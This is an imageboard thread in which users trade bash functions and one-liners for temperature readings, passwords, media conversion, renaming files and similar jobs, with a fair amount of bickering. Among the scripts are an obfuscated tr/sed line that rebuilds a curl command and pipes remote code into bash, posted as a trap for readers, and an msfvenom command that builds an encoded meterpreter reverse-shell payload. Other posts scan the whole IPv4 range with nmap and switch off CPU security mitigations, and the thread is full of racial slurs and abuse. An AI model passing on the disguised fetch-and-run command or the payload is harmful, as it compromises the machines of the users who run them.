# Print the CPU temperature in whole degrees C from the first hwmon
# device whose name looks like a CPU temperature sensor (Intel coretemp,
# AMD k8temp/k10temp, ITE it87xx, Nuvoton nct6775).
# Fix: the original used `=~ "k*temp"` / `=~ "it87*"` — quoting the
# right-hand side of =~ makes it a literal substring match, so those
# patterns never matched k8temp, k10temp, it8728, etc.  Use unquoted
# glob patterns with == instead.  temp1_input is in millidegrees, hence
# stripping the last three digits.
temperature(){ for cputempdevice in /sys/class/hwmon/*; do cputempname=$(<"$cputempdevice/name"); if [[ $cputempname == coretemp || $cputempname == k*temp || $cputempname == it87* || $cputempname == nct6775 ]]; then break; fi; done; temp=$(<"$cputempdevice/temp1_input"); echo "${temp:0:-3}C";}
# temperature



Interesting. I've used this from an earlier thread but yours is more accurate.

temp=$(cat /sys/class/thermal/thermal_zone0/temp)
temp=$(echo "scale=1;(${temp}/1000)" | bc)
echo "${temp}°C"


sea shells sea shells by the sea shore.


fix for amd devices

temperature(){ for cputempdevice in /sys/class/hwmon/*; do cputempname=$(<$cputempdevice/name); [[ $cputempname == coretemp || $cputempname == it87* || $cputempname == nct6775 || $cputempname == k8temp || $cputempname == k9temp ]] && break; done; temp=$(<$cputempdevice/temp1_input); echo ${temp:0:-3}C;}



# List every hwmon sensor that exposes temp1_input, as
# "<name> <millidegrees-C>" one per line.
# Fix: quote all expansions (defensive; also silences ShellCheck SC2086).
temps(){ for tempdevice in /sys/class/hwmon/*; do [ -f "$tempdevice/temp1_input" ] && echo "$(<"$tempdevice/name") $(<"$tempdevice/temp1_input")"; done;}
# temps


# Kill the current shell with SIGKILL ($$ is this shell's own PID).
alias suicide='kill -9 $$'

# Open the given file(s)/URL(s) with the desktop default handler.
function doubleclick(){ xdg-open "$@"; }


File: bd031e812012b49⋯.jpg (110.44 KB, 377x500, 377:500, 1537372072639.jpg)

x="${1:?}"; shift; y=("${@:?}")
for i in "${y[@]}"; do
man "${x}" \
| sed -n "s/.\\x08//g;/^\\s*${i}/,/^$/p" \
| fmt -w "${COLUMNS}"
complete -c 'boy'
$ boy grep -G -E -P
-G, --basic-regexp
Interpret PATTERN as a basic regular
expression (BRE, see below). This is
the default.

-E, --extended-regexp
Interpret PATTERN as an extended regular
expression (ERE, see below).

-P, --perl-regexp
Interpret the pattern as a
Perl-compatible regular expression
(PCRE). This is experimental and grep
-P may warn of unimplemented features.



Nifty idea, until you miss the option caveats written elsewhere in the text.

If I need a refresher on an option I take it as an opportunity to learn/find better way of doing something.

$grep --help



>use tput(1)

What's the proper procedure if my tput is BSD? Should I check for the existence of /usr/local/bin/tput and use that instead? Reason for asking is that tput on dflybsd (and probably other BSD) don't know anything about screen or tmux.

$ which tput
$ echo -n Hi; tput ch 0; tput ce; echo Hello
$ alias tput=/usr/local/bin/tput
$ echo -n Hi; tput ch 0; tput ce; echo Hello

Also nice that ncurses' tput accepts terminfo capability names;



I don't know, just look at man 1p tput for the POSIX spec and whine to your OS maintainers if it doesn't comply.



ANSI escape codes is probably more portable and less trouble.



echo 'carl the moongeek/o.lye10uA8/C' | tr gnu/homekat :phisth/bu\- | sed s./.L. | bash | bash



I figured so and it's what I've been using.

I'd much rather run

printf "Hello"; sleep 1; printf "\x1b[G\x1b[K\x1b[1;34mHi\x1b[m\n"

than bringing tput into things.



>readability matters

Set variables for the settings:

Bold=$(tput bold) ;\
Reg=$(tput sgr0) ;\
echo "Regular and ${Bold}some bold${Reg} text"


Real simple function I use at work constantly:

```sgrep() {

grep -i "$1" ~/.ssh/config


Never know when you'll need to send someone the connection details for a server.



Man, that's embarrassing. To make up for my shoddy markup here's a one liner I use for generating passwords for databases and shit where it doesn't matter if I can remember it or not:


tr -dc '[:alnum:]' < /dev/urandom | fold -w 30 | sed 1q




Fuck sake I really can't remember the 8ch formatting



I use this instead:

#!/usr/bin/env sh
# Print one random password line.
#   -s        "simple": alphanumeric only (default charset: all printable
#             non-whitespace, [:graph:])
#   LENGTH    next argument, if a positive integer: password length
#             (default 32)
# Fix: quote $F — unquoted, the bracket expression [:alnum:] undergoes
# pathname expansion and can silently become a filename from the current
# directory (it globs any file named :, a, l, n, u or m).  $N quoted too.
[ "$1" = '-s' ] && { F='[:alnum:]'; shift 1; } || F='[:graph:]'
[ "$1" -gt 0 ] 2> /dev/null && N=$1 || N=32
tr -cd "$F" < /dev/urandom | fold -bw "$N" | head -n 1
unset F N


# Print ~100 random bytes filtered to printable characters as a
# throwaway password, prefixed with a short status message.
# Fix: read from /dev/urandom — on older kernels /dev/random can block
# indefinitely waiting for entropy, with no security benefit here.
passgen(){ echo -n "Generating password... "; head -c 100 /dev/urandom | tr -cd "[:print:]"; echo;}
# passgen



# cd to the directory containing the given executable.
# usage: cdf COMMAND
# (the else/fi lines were lost to broken post markup; restored here,
# and the non-portable `which` replaced with the POSIX `command -v`)
cdf() {
  local file
  file=$(command -v "$*")
  if [[ -f "${file}" ]]; then
    cd "$(dirname "${file}")"
  else
    echo "'$*' does not exist." >&2
    return 1
  fi
}

# one-liner if bloat bothers you
# Bug fix: the original had no `;` before `}`, so the brace group never
# terminated ( `}` was passed as an argument to cd ); also use the
# POSIX `command -v` instead of the external `which`.
cdf() { [[ -f "$(command -v "$*")" ]] && cd "$(dirname "$(command -v "$*")")"; }


Both Arch and Gentoo are really suck! Actually, Ubuntu or Mint is better.


pretty epic huh

alias lsa='ls -p --quoting-style=escape | grep -v / | xargs -0 -d "\n" -I % file -i % | grep -E "image/[p|j|g]" | awk "{print \$1}" | tr -d \: | sxiv -t -'



alias fuck="sudo !!"



>are really

Illiterate, just like your choice in distro.



Is this bait?




No it doesn't look like it.

If you forgot to use sudo on a command, then it runs the last command (!!) with sudo (sudo !!) by simply typing "fuck".



Because it doesn't work?

 ~$ alias fuck="sudo !!"
~$ alias fuck
alias fuck="sudo <whatever command you entered previously>"
~$ alias fuck='sudo !!'
~$ alias fuck
alias fuck='sudo !!'
~$ fuck
sudo: !!: command not found



>Because it doesn't work?

Not in your shell it doesn't

$echo foo

echo foo

>How do I repeat the last command without using the arrow keys

>With csh or any shell implementing csh-like history substitution (tcsh, bash, zsh):





Since you clearly did not read what I posted, let me type it out for you again:

 ~$ alias fuck="sudo !!"
alias fuck="sudo <whatever command you entered previously>"
 ~$ ls
~$ alias fuck="sudo !!"
alias fuck="sudo ls"
Running bash. The fucking fuck alias doesn't fucking work.



you may have to reference the history file directly then via an evaluation: $(history -p !!) will get the last command in the history (!!) and not run it, effectively it does the substitution dynamically when the alias is executed. Otherwise using the double quotes as you do is a static substitution done once when the alias is defined.

alias fuck='sudo $(history -p !!)'

Note: Use of apostrophes/single quotes (and not double quotes as you're using.)There is a significant difference in the shell interpretation.

$alias fuck='sudo $(history -p !!)'
$echo foo

$alias fuck="sudo $(history -p !!)"
alias fuck="sudo $(history -p <last-command-is-substituted-here>)"






if you want to do the command line meme of setting your alias, you have to escape the exclamation mark, absolutely low IQ










y'all mother fuckers need to stop making scripts and reread the gnu's reference manual on bash.

One you're probably interested in right now is titled "history expansion".



History expansion, and especially "!!" doesn't work normally outside of the interactive shell. Saving an alias like that would either save directly the previous command, or it'll just try and execute "!!" which isn't a real command.

As far as alias is concerned, you're not actually looking for the previous command, as it is set up to run actual commands, not bash; "!!" is expanded before execution, not during, so it isn't interpreted that way.

However, you can hack around it in an attempt to make it work, but it's definitely not as simple as just running an alias.



What the fuck


I made this while drunk to show an irl friend the capabilities of bash and stuff. He destroyed his entire filesystem within a week though

set -e


function exit_error() {
case "${1}" in
notify-send "Could not get YouTube URL"
notify-send "No devices found"
notify-send 'youtube-dl failed to download' "$(xclip -o)"
notify-send "Could not find file in directory"
notify-send "kdeconnect could not send file"
exit 1

mkdir -p ~/Music
cd ~/Music

video_url="$(xclip -o | awk -F"=|&" '{print $2}')"
[[ -z "${video_url}" ]] && exit_error 0

mapfile -t dev_ids < <(kdeconnect-cli -l | awk '/reachable/{print $3}')
[[ ${#dev_ids[@]} -eq 0 ]] && exit_error 1

youtube-dl -x --audio-format vorbis "https://www.youtube.com/watch?v=${video_url}" || exit_error 2
file="$(ls ./*"${video_url}."*)" || exit_error 3

for dev_id in "${dev_ids[@]}"; do
kdeconnect-cli -d "${dev_id}" --share "${file}" || exit_error 4
notify-send 'Success' "Sent ${file} \\nto ${dev_id}"



>set -e

>not set -eu

>not set -eu -o pipefail

Faggots using bash without the only stuff that makes it better than sh should die.



>not #!/bin/bash -eu

Before you start being a nigger about common practises you should actually learn them. There's a ton of problems with my script but like I said I was drunk, faglord.



or even better

>#!/usr/bin/env -S bash -euo pipefail


# Resample audio with sox's very-high-quality rate engine.
# usage: soxresample input.flac 96000 output.flac
# All expansions are quoted so filenames with spaces or glob chars work.
soxresample(){ input="$1"; res="$2"; output="$3"; sox "$input" "$output" rate -v -b 99.7 -M "$res";}
# soxresample input.flac 96000 output.flac


# Flatten a GIMP .xcf file and export it (format inferred by GIMP from
# the output extension) via batch Script-Fu: load the file, merge all
# visible layers clipped to the image bounds, save the merged drawable,
# then quit GIMP.
# NOTE(review): the load uses RUN-INTERACTIVE, matching the other gimp
# helpers in this thread — presumably deliberate; confirm before changing.
xcftoimage(){ input="$1"; output="$2"; gimp -ib "(let* ((image (car (gimp-file-load RUN-INTERACTIVE \"$input\" \"$input\")))(drawable (car (gimp-image-merge-visible-layers image CLIP-TO-IMAGE))))(gimp-file-save RUN-NONINTERACTIVE image drawable \"$output\" \"\"))(gimp-quit 0)";}
# xcftoimage image.xcf image.png



That looks hella complicated for something that should be easy.

for i in *
ffmpeg -y -i "$i" -c:v libvpx-vp9 -b:v xxxk -pass 1 -an -f webm /dev/null
ffmpeg -y -i "$i" -c:v libvpx-vp9 -b:v xxxk -pass 2 -c:a libopus -b:a xxk ../"${i%.*}".webm


for a in {0..255}; do for b in {0..255}; do for c in {0..255}; do for d in {0..255}; do nmap -oG grep.txt -Pn -p XX $a.$b.$c.$d; done; done; done; done



You really shouldn't be doing that in bash



You're right masscan or zmap would be faster. It was an example I had written down.



Did you also write out all permutations for {0..255}.{0..255}.{0..255}.{0..255}?



With that code? Fuck no. It takes about 13 hours with zmap.




wget -qO- 'https://beacon.nist.gov/rest/record/last' \

| sed -E 's/.*<outputValue>(.*)<\/outputValue>.*/\1/' \


shuf \

--head-count 1 \

--input-range 0-1 \

--random-source <(cat <<< "$beacon") \

| sed 's/1/heads/; s/0/tails/'




nmap -p 80



That's some illiteracy.



That the left part is essentially cuckchan desktop threads, while the right part implies intermediate-to-expert Linux/programming experience those on the left usually do not have.


# fallocate -l 32GB drive && lspci

sudo sh -c '
devices=(01:00.0 01:00.1 00:12.0 00:12.2)

for devid in ${devices[@]}; do devid=0000:$devid
echo $(</sys/bus/pci/devices/$devid/vendor) $(</sys/bus/pci/devices/$devid/device) > /sys/bus/pci/drivers/vfio-pci/new_id
echo $devid > /sys/bus/pci/devices/$devid/driver/unbind
echo $devid > /sys/bus/pci/drivers/vfio-pci/bind
echo $(</sys/bus/pci/devices/$devid/vendor) $(</sys/bus/pci/devices/$devid/device) > /sys/bus/pci/drivers/vfio-pci/remove_id

qemu-system-x86_64 -enable-kvm -m 4G -cpu host -smp cores=8,threads=1 -vga none -display none -cdrom windows.iso -drive if=pflash,format=raw,readonly,file=/usr/share/edk2-ovmf/OVMF_CODE.fd -drive if=pflash,format=raw,file=/usr/share/edk2-ovmf/OVMF_VARS.fd -drive file=drive,format=raw $(sed "s/ / -device vfio-pci,host=/g" <<< \ ${devices[@]})

for devid in ${devices[@]}; do devid=0000:$devid
echo 1 > /sys/bus/pci/devices/$devid/remove
echo 1 > /sys/bus/pci/rescan


Is there a good w3m guide?

t. not quite a w3m wizard, but knows enough to make this post with it


>spend half an hour writing ffmpeg wrapper which replaces stuff like <0:s:1> with extracted temporary .ass file, so that I can burn subtitles for use on my phone

>find out that mpv-android is already in usable state and supports ass subtitles, right after I finish the script

Oh well.

What settings do you use for your phone anyway? Or do you just copy over the full encodes?

At least it might be useful subbed webms. I guess, with little work the script could be used to support extracting arbitrary streams too, using something like <stream_specifier-file_extension> instead of the current <stream_specifier> syntax.

function runff() {
echo @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
echo -- ffmpeg "$*"
echo @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
ffmpeg -hide_banner "$@"

function get_stream_specs() { grep -o '<[^> ]*>' <<< "$*" | sort -u | sed 's/^<//;s/>$//'; }

# find inputs part of the command line
# note: when i=n, ${!i} is equivalent to $n
inputs=() # ffmpeg input arguments
ninputs=0 # # of last input arg.
for (( i=1; i <= $#; ++i )); do [ "${!i}" = '-i' ] && ninputs=$((i+1)); done
if [ $ninputs -le 1 ];then echo "there are no inputs. exiting"; exit 1; fi
for (( i=1; i <= ninputs; ++i )); do inputs+=("${!i}"); done
echo -- "inputs: " "${inputs[*]}"

# extract used subtitles into separate files
declare -A exported_streams # map of stream_specifier => /path/to/extracted/tmp/file
cmd=("$@") # will contain the final command
for stream_spec in $(get_stream_specs "$*"); do
runff "${inputs[@]}" -map "$stream_spec" "$filename"

# replace the subtitle args with files; do this for each ffmpeg argument separately
for i in "${!cmd[@]}"; do
for stream_spec in $(get_stream_specs "$arg"); do
arg=$(sed "s@<$stream_spec>@${exported_streams[$stream_spec]}@g" <<< "$arg")
runff "${cmd[@]}"
rm "${exported_streams[@]}"




>viewing stuff on smartphone

Bashniggers never dissapoint.



I'm not gonna lug a laptop just so I can watch shit on public transport.



i was so into batch when i was growing up man I made entire animations and UI's batch is so pure and perfect


linux /boot/vmlinuz root=/dev/sda1 ro pti=0 ibrs=0 retp=0 ibpb=0 spectre_v2=off l1tf=off nospec_store_bypass_disable no_stf_barrier



(( $(( $RANDOM % 2 )) )) && echo heads || echo tails

>relying on the US gov for your randomness



$RANDOM is non-standard, and its implementations are usually needlessly suboptimal. Get your randomness from /dev/urandom instead.




# Flip a coin from one byte of kernel randomness.
# Fixes: plain `od -An -N1` prints the byte in OCTAL, which bash
# arithmetic then re-reads as decimal (or octal on a leading zero);
# -tu1 makes it unsigned decimal explicitly. /dev/urandom never blocks.
flipcoin(){ (($(od -An -N1 -tu1 /dev/urandom) % 2)) && echo heads || echo tails;}
# flipcoin


Is there a way to search within rtorrent's ncurses GUI?

I want to switch from transmission to rtorrent but now that I think about it, this is going to get pretty clunky once I have a few torrents on it.



rtorrent needs rutorrent to be usable.



Untrue, I'm seeding 1500 torrents right now with just rtorrent


File: a72015a084e19b0⋯.mp4 (525.35 KB, 360x640, 9:16, Fuck_niggers.mp4)




>at all

Sorry, I'm a white man.



I just realized they aren't saying "fuck niggers" at all because it's backwards.


File: a0860fcdb0df009⋯.webm (316.8 KB, 360x640, 9:16, out2.webm)


I've probably seen that a dozen times and never realized it was reversed before





File: ee3e8cc290d2904⋯.jpg (22.35 KB, 500x384, 125:96, mfw.jpg)


They're saying fuck niggers backwards, then?



Yeah, people in their live stream got them to scream it without them knowing what it really meant. If I remember correctly, their university found out and they got in shit or something.



You have no reason to switch from transmission to rtorrent. In fact, I did the opposite because rtorrent crashed sometimes and is in general bad abandonware without a daemon/client architecture.



rtorrent is one of the worst torrent clients without it. Just try to add torrents that aren't in the same folder and you will notice how annoying it is. Also, doing something to a single torrent is almost impossible with the CLI if you have thousands of torrents in it.



rtorrent can max out my connection perfectly, whereas transmission only rarely did it. I even basically ported over my transmission config as far as peer counts and so on are concerned, so I think it's a difference in their torrent implementation.

rtorrent is also many times lighter, I'd say it does a better job for less.

The only thing the rtorrent ncurses UI is missing is a search function, something like htop's filter, or a plain old "forward slash to search", and then it's perfect.

Migrating from transmission is easy, I'm going to keep using this and if I find sorting by name too clunky I'll migrate back.

By the way, this is not my first experience with rtorrent; I used to seed from a Nintendo Wii running Debian, however I never considered putting it on my PC.



Rtorrent is supposed to be used on VERY high speed internet connections for their improvement to matter.

>many times lighter

Are you sure? The transmission daemon is very light.

Anyway, you'll only get pain by using rtorrent. Wait until it becomes active again, at least.



i use transmission and its way too heavy for the arm meme board that i run it on. just few torrents will make the whole system unresponsive and the loads are at 100% until the seeding stops


File: b7981481cd54f89⋯.png (2.68 KB, 590x55, 118:11, trans.png)


this is with 10 torrents and total upload speed of them is 50mbps(in isp marketing units)


# Repeatedly re-encode an image at random JPEG quality to "deep fry" it.
# usage: deepfry input.jpg 1000 output.jpg
# All expansions are quoted so filenames with spaces survive.
# NOTE(review): the temp file "_$output" assumes output is a bare
# filename in the current directory — confirm before passing paths.
deepfry(){ input="$1"; iterations="$2"; output="$3"; cp "$input" "$output"; for ((n=0;n<iterations;n++)); do convert "$output" -quality "$(shuf -n1 -i 50-100)" "_$output"; convert "_$output" -quality "$(shuf -n1 -i 50-100)" "$output"; done; rm "_$output";}
# deepfry input.jpg 1000 output.jpg



Well, I have a 100KBps up, so it may be why. There's a lightweight transmission USE flag to use less RAM, though. Maybe try Synapse torrent?


File: 71baa46442a96d0⋯.jpg (202.22 KB, 1280x904, 160:113, 8c6881a3278048ce23c39b0f68….jpg)

Though I have been aware of this kind of software for ages, only now did it spring up on my head.

I just emerged midnight commander and nnn, what exactly does a commandline file manager do to improve my efficiency, and which one of these 2 or any others do you recommend?

I'm looking over both and I'm not sure what conclusions to draw from them.



a file manager that cant be used with the mouse is useless. would just use the standard tools like ls cp or mv then. file managers should make doing things with files easy and beating the keyboard to move one file takes much more time than dragging it somewhere with the mouse


File: a2bda00b0084c6a⋯.gif (177.88 KB, 217x217, 1:1, 1550892791548.gif)

Any bash golfers ITT?

I've discovered so far:

<while true;do something;done

>while :;do something;done

<for i in 1 2 3;do something;done

>for i in 1 2 3;{ something;}

<x(){ while :;do something;done;};x

>x()while :;do something;done;x


File: 506379e52214033⋯.png (3.64 KB, 266x36, 133:18, trans.png)


maybe the debian packaged version just sucks. compiled the latest from source and it works much better. would use another distro on it but its an arm board so you cant just dump some random distro in it and have it work


File: 12d635530b58903⋯.jpg (117.12 KB, 960x540, 16:9, 509e7dd0659a1a0e92c1135ea2….jpg)



Yeah, after digging around for a few days I found MC and NNN pretty useless. It seems that tab completion replaces selecting files, find replaces their search function, and anything you might whip up with filters and "add to .tar.gz" & similar shortcuts can be replaced with shell aliases, expansions and regular expressions, and I'm not sure any of those features are faster than typing in commands even if they work on single keybinds.

You're still dealing with a UI of sorts that you have to wade through to do what you want, instead of a command line where you just say what you want.

I did keep NNN installed at least, MC however has a godawful emacs UI and I don't want that shit.



There's Void or ArchARM probably. Debian and its antediluvian packages are a known problem. Search for Debian in Transmission's Issues on Github and you find stuff like https://github.com/transmission/transmission/issues/313

Just switch to Gentoo with a cross-compiler chroot.



Dont meant to derail the thread, but these girls went to a university near me. Pretty sure this was the case. Some stupid athlete nigger came out to give a "powerful statement" about how racism is still alive. This shit happens a lot in Utah. Some local nigger got in a fight with my highschool buddy and claimed my buddy called him nigger. Kid immediately got media attention even though he had threatened my classmate and other students over text to roll up to their house and beat them up.


File: 87ae6aa239c5674⋯.png (98.87 KB, 1366x768, 683:384, shellter.png)

msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 --platform

win HOPURL= EXTENSIONS=stdapi,priv -f raw -o





A bunch of complicated commands and complicated software to edit a textfile and send it via curl/wget. You are a script kiddy and a faggot.


Most of my scripts are just quick macros or really specific to my setup, like printing the last made screenshot according to my naming scheme so i can quickly open the newest one, but I guess these two might be of interest to /tech/.

# Quick and dirty way to read docx documents
# (a .docx is a zip; extract the main XML part to stdout, turn each
#  paragraph end </w:p> into a newline, strip the remaining tags, then
#  drop any non-printable characters except newlines)
unzip -p "$1" word/document.xml | sed -e 's|</w:p>|\n|g; s/<[^>]\+>//g; s/[^[:print:]\n]//g'

# Extracts image URLs from imgur albums so you don't need JS
# (splits the page at tags, keeps the <div id="xxxxxxx"> entries whose
#  7-char id is the image id, and prints both a .jpg and a .png URL for
#  each since the real extension is not known from the page)
curl "https://imgur.com/a/$1" 2>/dev/null | sed -e 's/</\n</g' | grep '<div id="......."' | sed -e 's/.*<div id="\(.......\)".*/https:\/\/i.imgur.com\/\1.jpg https:\/\/i.imgur.com\/\1.png/'



The first statement there is a one liner. You're not even familiar with MSF commands and you're calling someone a script kiddy. The irony. Rekt.

But you're right I should automate the entire process. I'm bored of Linux but this shell thread is actually pretty cash.



I think the anon meant why not nc, sed/ed, and perhaps curl?



how does it work

doesn't w3m already have image viewing?



as for writing a downloader

isn't is as simple as using the (web client) module, and then using http-request on the image links of the thread?



# Run the remaining arguments as a command each time FILE is written.
# usage: onchange FILE CMD [ARG...]
# (the loop body and closing braces were lost to broken post markup;
#  reconstructed from the usage example "onchange source.tex pdflatex source.tex")
onchange () {
  while true; do
    inotifywait -e close_write "$1"
    "${@:2}"
  done
}




# onchange source.tex pdflatex source.tex


Runs a command whenever the given file changes. In this example, used to recompile a tex file whenever it is saved.



Linux is a kernel.



Just do wget "imgur.com/a/${id}/zip" -O "${id}.zip" and you get the album zipped.

That said, try to find other sources than imgur since imgur is known for reducing jpg quality.


File: d69f37648254207⋯.jpg (38.88 KB, 400x300, 4:3, 1517515637551.jpg)

Been on a system where (p)rename wasn't available and made this in bash:

if [[ "${1}" == '-n' ]]; then shift
regex="${1}"; shift
for file in "${@}"; do
echo mv -v -- "${file}" \
"$(sed -- "${regex}" <<< "${file}")"
regex="${1}"; shift
for file in "${@}"; do
mv -v -- "${file}" \
"$(sed -- "${regex}" <<< "${file}")"

Usage is just like sed:

$ smv 's/jpeg/jpg/' *jpg

-n provides a (no-acting) preview.

Improvements welcome. I guess there's a better way to provide -n without repeating myself <https://en.wikipedia.org/wiki/Don%27t_repeat_yourself>.




I've made several scripts

>godawful complicated interactive script to cut multiple audio segments from videos and combine them into one file (if it works...)

>script to tag audio files (one to do single files at a time, another to do batches of similar files at once)

>script to optimize image files with fancy output

>script to make an Anki deck given video files with .srt or .ass files named similarly (image, audio, line, tags)

The last one entirely replaces programs that I needed hundreds of megabytes of dependencies to run a shitty GUI that couldn't remember default settings. It does shit like remove retarded formatting, badly encoded subs, audio normalization, padding, and is faster than the other programs I tried as well.



could do something like:

if [[ "${1}" == '-n' ]]; then 
CMD="echo mv";
for f in $@; do
$CMD $f `sed $1 <<< $f`;

modulo quoting and so on


Guys, install fish. It's great. This is the first time I have ever used a non-insane shell.

My only complaint is that if your prompt is multiple lines and you ^C to clear a command you started typing, the prompt will overwrite that command on the screen, when I'd prefer if it displayed under the incomplete command's lines.


This thread is probably dead, but something that saves me is this:

function prv
eval $(history 2 | head -n 1 | sed -r 's/ [[:digit:]]* //') # Get second-to-last action


rate="29.97003" # it can be also "23.976024" or "25"
truncate -s %$(($width*$height/($block**2)/8)) $1
ffmpeg -f rawvideo -pix_fmt monob -s $(($width/$block))x$(($height/$block)) \
-r $rate -i $input -vf "scale=iw*${block}:-1" -sws_flags neighbor \
-threads 8 -deadline best -c:v libvpx -b:v 256k $2
input=$1; output=$2; block=8
ffmpeg -i $1 -vf "format=pix_fmts=monob,scale=iw/${block}:-1" \
-sws_flags area -f rawvideo $2



this converts any file into a snowcrash video



GRUB_CMDLINE_LINUX_DEFAULT="pti=off ibrs=off retp=off ibpb=off spectre_v2=off l1tf=off nospec_store_bypass_disable no_stf_barrier" grub-mkconfig -o /boot/grub/grub.cfg



Absolute madman


I made a feed reader for my acme client. It works with JSON feeds only, but you can use another program to turn RSS/Atom feeds into JSON feeds. You do need jq (https://stedolan.github.io/jq/) for it to work at all.

# RSS/Atom/JSON Feed reader for acme
# This code is in the public domain
for url in $(cat /home/parker/bin/URLS)
curl -s $url > $temp
jq -r '.title' $temp
jq -r ' .items | .[] | [.title, .url] | join("\t") ' $temp | sed 11q
echo ==========================================================================
rm $temp
done | 9p write acme/new/body

writetoacme JSON-Feeds

And for anyone interested in the writetoacme function:

# Shortcut for common writing acme applications
# USAGE: writetoacme $1
# $1: name of window
# This code is in the public domain
# The newest acme window has the highest numeric id; take it from a
# numeric sort of the 9p directory listing.
last=$(9p ls acme | sort -g | tail -n 1)
# Name the window, mark it clean so acme won't prompt about unsaved state.
echo "name $1" | 9p write acme/$last/ctl
echo -n "clean" | 9p write acme/$last/ctl
# Move the selection (dot) to the start of the body...
echo -n "0,0" | 9p write acme/$last/addr
echo -n "dot=addr" | 9p write acme/$last/ctl
# ...and scroll the window so the selection is visible.
echo -n "show" | 9p write acme/$last/ctl



>using echo -n and not printf

Absolutely disgusting. Also, one should ALWAYS use set -eu in his shell scripts.



set -euo pipefail



>bash niggers or zsh/ksg snowflake

If you need more than POSIX sh, use tclsh or scheme.


Made a minimal CloverOS iso: https://0x0.st/zNUZ.txt





Made a few improvements to this. Not POSIX compliant, but most things run bash anyway.

#!/usr/bin/env -S bash -euo pipefail

# Sets display variables for notify-send
# User might vary depending on machine, check /etc/passwd

# Below provides some information when the script exits without completing successfully
function exit_error(){
case "${1}" in
notify-send "${HOME}/Music directory does not exist or cannot be created"
notify-send 'A YouTube URL could not be found in the history'
notify-send 'No kdeconnect devices could be found'
notify-send 'youtube-dl failed to download'
notify-send 'Could not find file in directory'
notify-send 'kdeconnect could not send file'
notify-send 'Required dependencies not found in $PATH' 'Dependencies are kdeconnect, xclip, youtube-dl'
notify-send 'Unable to copy/delete the history database. Permission error?'
exit 1

# Checks for a list of commands to see if they're installed as required by the script
# If any of the commands aren't found it will exit
command -v notify-send &>/dev/null || echo 'notify-send is not in $PATH (provides error reporting)'
command -v kdeconnect-cli &>/dev/null || exit_error 99
command -v xclip &>/dev/null || exit_error 99
command -v youtube-dl &>/dev/null || exit_error 99
command -v sqlite3 &>/dev/null || exit_error 99

# Create the Music directory in $HOME if it does not already exist and changes the current working directory to it
mkdir -p "${HOME}/Music" || exit_error 0
cd "${HOME}/Music" || exit_error 0

# Adds a list of connected and reachable devices listed by kdeconnect to an array
# If none are found it exits
mapfile -t dev_ids < <(kdeconnect-cli -l | awk '/reachable/{print $3}')
(( ${#dev_ids[@]} == 0 )) && exit_error 2

# Searches for a Youtube URL in the firefox cache files
while read -r cache_file; do
video_url="$(grep -aoE 'https://www.youtube.com/watch\?v=[a-zA-Z0-9_-]{11}' "${cache_file}" | grep -oP '[\w-]{11}')" && break
done < <(find "${HOME}"/.cache/mozilla/firefox/*.default/cache2/entries/ -type f -printf '%T@ %p\n' | sort -r | cut -d' ' -f2)

# If no URL was found in the cache files, it will use Firefox's history database to find one
if [[ -z "${video_url}" ]]; then
hist_db="$(find "${HOME}/.mozilla/firefox/" -name "places.sqlite")"
cp "${hist_db}" places-copy.sqlite || exit_error 127

hist_query="select p.url from moz_historyvisits as h, moz_places as p where substr(h.visit_date, 0, 11) >= strftime('%s', date('now')) and p.id == h.place_id order by h.visit_date;"
video_url="$(sqlite3 places-copy.sqlite "${hist_query}" | grep 'youtube.com' | awk -F'=|&' 'BEGIN {err=1} length($2) == 11 {err=0; print $2} END {exit err}' | tail -1)" || exit_error 1

rm places-copy.sqlite

# Downloads the video, converts to vorbis (.ogg) and attempts to find the downloaded vorbis file
youtube-dl -x --audio-format vorbis "https://www.youtube.com/watch?v=${video_url}" &>/dev/null || exit_error 3
file="$(readlink -f <<< ls ./*"${video_url}."*)" || exit_error 4

# Attempts to send the converted file to all kdeconnect devices
for dev_id in "${dev_ids[@]}"; do
kdeconnect-cli -d "${dev_id}" --share "${file}" &>/dev/null || exit_error 5
notify-send 'Success' "Sent ${file}\\nto ${dev_id}"


curl https://8ch.net/tech/res/1003160.html | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | grep file_store | xargs -I{} wget {}

[Return][Go to top][Catalog][Nerve Center][Cancer][Post a Reply]
Delete Post [ ]
[ / / / / / / / / / / / / / ] [ dir / aus / boxxy / choroy / dempart / f / jenny / jp / komica ]